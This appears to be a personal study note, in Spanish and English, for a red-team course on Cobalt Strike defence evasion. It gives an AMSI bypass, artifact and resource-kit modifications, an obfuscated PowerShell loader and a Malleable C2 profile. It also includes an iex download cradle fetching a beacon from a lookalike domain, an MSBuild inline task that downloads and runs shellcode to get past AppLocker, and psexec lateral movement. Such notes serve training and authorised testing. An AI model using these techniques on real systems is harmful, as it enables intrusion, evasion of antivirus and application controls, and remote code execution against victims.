0 - Idioma teclado y Evasión.md

IDIOMA

• Cheatsheet extra: https://github.com/An0nUD4Y/CRTO-Notes/blob/main/CRTO%20-%20Cheatsheet.md#forest--domain-trusts

• Cambiar teclado a español:

$LangList = Get-WinUserLanguageList
$LangList.Add("es-ES")
Set-WinUserLanguageList $LangList -Force

Vamos a language settings(escribes "la" en windows) y seleccionas español.

EVASION

AMSI BYPASS, lanzarlos por separado.

#Comando 1
$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')

#Comando 2
$a.SetValue($null,$true)

Artifacts

1. Launch Visual Studio Code.
2. Go to File > Open Folder and select C:\Tools\cobaltstrike\arsenal-kit\kits\artifact.
3. Navigate to src-common and open patch.c.
4. Scroll to line ~45 and modify the for loop. This is for the svc exe payloads

x = length;
while(x--) {
  *((char *)buffer + x) = *((char *)buffer + x) ^ key[x % 8];
}

5. Scroll to line ~116 and modify the other for loop. This is for the normal exe payloads.

int x = length;
while(x--) {
  *((char *)ptr + x) = *((char *)buffer + x) ^ key[x % 8];
}

6. Save the changes (File > Save) and close the folder (File > Close Folder).
7. On the Windows taskbar, right-click on the Terminal icon launch Ubuntu.
8. Change the working directory.

cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/artifact

6. Run build.sh to build the new artifacts.

./build.sh mailslot VirtualAlloc 351363 0 false false none /mnt/c/Tools/cobaltstrike/custom-artifacts

6. Open the Cobalt Strike client and load artifact.cna from C:\Tools\cobaltstrike\custom-artifacts\mailslot.

Resources

1. If not already open from the previous task, launch Ubuntu from the Windows Terminal.
2. Change the working directory.

cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/resource

3. Run build.sh to build new resources.

./build.sh /mnt/c/Tools/cobaltstrike/custom-resources

4. If not already open from the previous task, launch Visual Studio Code.
5. Go to File > Open Folder and select C:\Tools\cobaltstrike\custom-resources.
6. Select template.x64.ps1.
7. Rename the func_get_proc_address function on line 3 to get_proc_address.
8. Rename the func_get_delegate_type function on line 10 to get_delegate_type.

• Asegurate de que las variables al cambiarle el nombre tambien le cambies el nombre en todas sus llamadas

4. Scroll to line 32 and replace it with:

• Añadelo tal cual y no borres mas lineas solo metelo

$var_wpm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll WriteProcessMemory), (get_delegate_type @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr]) ([Bool])))
$ok = $var_wpm.Invoke([IntPtr]::New(-1), $var_buffer, $v_code, $v_code.Count, [IntPtr]::Zero)

10. Save the changes (File > Save).
11. Select compress.ps1.
12. Use Invoke-Obfuscation to create a unique obfuscated version, or try the following:

SET-itEm  VarIABLe:WyizE ([tyPe]('conVE'+'Rt') ) ;  seT-variAbLe  0eXs  (  [tYpe]('iO.'+'COmp'+'Re'+'S'+'SiON.C'+'oM'+'P'+'ResSIonM'+'oDE')) ; ${s}=nEW-o`Bj`eCt IO.`MemO`Ry`St`REAM(, (VAriABle wYIze -val  )::"FR`omB`AsE64s`TriNG"("%%DATA%%"));i`EX (ne`w-`o`BJECT i`o.sTr`EAmRe`ADEr(NEw-`O`BJe`CT IO.CO`mPrESSi`oN.`gzI`pS`Tream(${s}, ( vAriable  0ExS).vALUE::"Dec`om`Press")))."RE`AdT`OEnd"();

10. Save the changes (File > Save).
11. Open the Cobalt Strike client and load resources.cna from C:\Tools\cobaltstrike\custom-resources.

Malleable C2

1. Open a new PowerShell window in Terminal.
2. SSH into the team server VM.

ssh attacker@10.0.0.5
Passw0rd!

3. Move into the profiles directory.

cd /opt/cobaltstrike/profiles

4. Open default.profile in a text editor (e.g. vim or nano).
5. Add the following stage block:

stage {
   set userwx "false";
   set module_x64 "Hydrogen.dll";  
   set copy_pe_header "false";
}

post-ex {
	set amsi_disable "true";
	set spawnto_x64 "%windir%\\sysnative\\svchost.exe";
	set obfuscate "true";
	set pipename "TSVCPIPE-########-####-####-####-###############";
	set cleanup "true";
	set smartinject "true";
	
	transform-x64 {
		      strrep "ReflectiveLoader" "NetlogonMain";
		      strrepex "ExecuteAssembly" "Invoke_3 on EntryPoint failed." "Assembly threw an exception";
		      strrepex "PowerPick" "PowerShellRunner" "PowerShellEngine";
		  }
}

process-inject {
	   execute {
	      NtQueueApcThread-s;
	      NtQueueApcThread;
	      SetThreadContext;
	      RtlCreateUserThread;
	      CreateThread;
	   }
	}

7. Save the changes.
8. Restart the team server.

sudo /usr/bin/docker restart cobaltstrike-cs-1

If the container fails to restart properly use to see the profile errors:

sudo /usr/bin/docker logs cobaltstrike-cs-1

#pipename
TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41337

#Con el set pipename bien configurado, metele este nombre a tu listener
TSVCPIPE-########-####-####-####-###############

Testing

1. Build new payloads

Go to **Payloads > Windows Stageless Generate All Payloads**
Folder: C:\Payloads

2. Host a 64-bit PowerShell payload.
   1. Go to Site Management > Host File
   2. File: C:\Payloads\http_x64.ps1
   3. Local URI: /test
   4. Local Host: www.bleepincomputer.com
3. Switch to Workstation 1 and login with Passw0rd!.
4. Open a PowerShell window.
5. Verify that Defender's Real-Time Protection is enabled.

(Get-MpPreference).DisableRealtimeMonitoring

DisableRealtimeMonitoring should return as False.

6. Download and invoke the PowerShell payload.

iex(new-object net.webclient).downloadstring("http://www.bleepincomputer.com/test")

7. Switch back to Attacker Desktop and a new Beacon should be checking in.
8. From the new Beacon, impersonate a local admin to lon-ws-1.

beacon> make_token CONTOSO\rsteel Passw0rd!

7. Verify that Defender's Real-Time Protection is enabled on the target.

beacon> remote-exec winrm lon-ws-1 (Get-MpPreference).DisableRealtimeMonitoring

8. Change the spawnto for the service payload.

beacon> ak-settings spawnto_x64 C:\Windows\System32\svchost.exe

9. Move laterally to lon-ws-1.

beacon> jump psexec64 lon-ws-1 smb

AppLocker

• Asegurate de hacer todo el bypass anterior, luego hostea un archivo en cobalt:

1. Hostea el http_x64.xprocess.bin
2. Url usa -> www.bleepincomputer.com
3. the ruta pon beacon.bin

• Luego crea en visual este codigo:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
   <MSBuildTest/>
  </Target>
   <UsingTask
    TaskName="MSBuildTest"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
     <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[

            using System;
            using System.Net;
            using System.Runtime.InteropServices;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            public class MSBuildTest :  Task, ITask
            {
                public override bool Execute()
                {
                    byte[] shellcode;
                    using (var client = new WebClient())
                    {
                        client.BaseAddress = "http://www.bleepincomputer.com";
                        shellcode = client.DownloadData("beacon.bin");
                    }
      
                    var hKernel = LoadLibrary("kernel32.dll");
                    var hVa = GetProcAddress(hKernel, "VirtualAlloc");
                    var hCt = GetProcAddress(hKernel, "CreateThread");

                    var va = Marshal.GetDelegateForFunctionPointer<AllocateVirtualMemory>(hVa);
                    var ct = Marshal.GetDelegateForFunctionPointer<CreateThread>(hCt);

                    var hMemory = va(IntPtr.Zero, (uint)shellcode.Length, 0x00001000 | 0x00002000, 0x40);
                    Marshal.Copy(shellcode, 0, hMemory, shellcode.Length);

                    var t = ct(IntPtr.Zero, 0, hMemory, IntPtr.Zero, 0, IntPtr.Zero);
                    WaitForSingleObject(t, 0xFFFFFFFF);

                    return true;
                }

            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
    
            [DllImport("kernel32", CharSet = CharSet.Ansi)]
            private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

            [DllImport("kernel32")]
            private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr AllocateVirtualMemory(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    
            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

            }

        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

• Ve a la ruta de ese archivo y ejecutalo

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe .\test.csproj

• Luego en otra maquina lo puedes hostear el test.csproj en cobal y descargrlo

1. Hosteas con la ruta /test.csproj y url www.bleepincomputer.com

2.  Descargar Invoke-WebRequest -Uri "http://www.bleepincomputer.com:80/test.csproj" -OutFile "test.csproj"

3. Ejecutas -> C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe .\test.csproj

OPSEC

ak-settings spawnto_x64 C:\Windows\System32\svchost.exe
ak-settings spawnto_x86 C:\Windows\SysWOW64\svchost.exe

beacon> ak-settings
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\svchost.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\svchost.exe'

beacon> jump psexec64 lon-ws-1 smb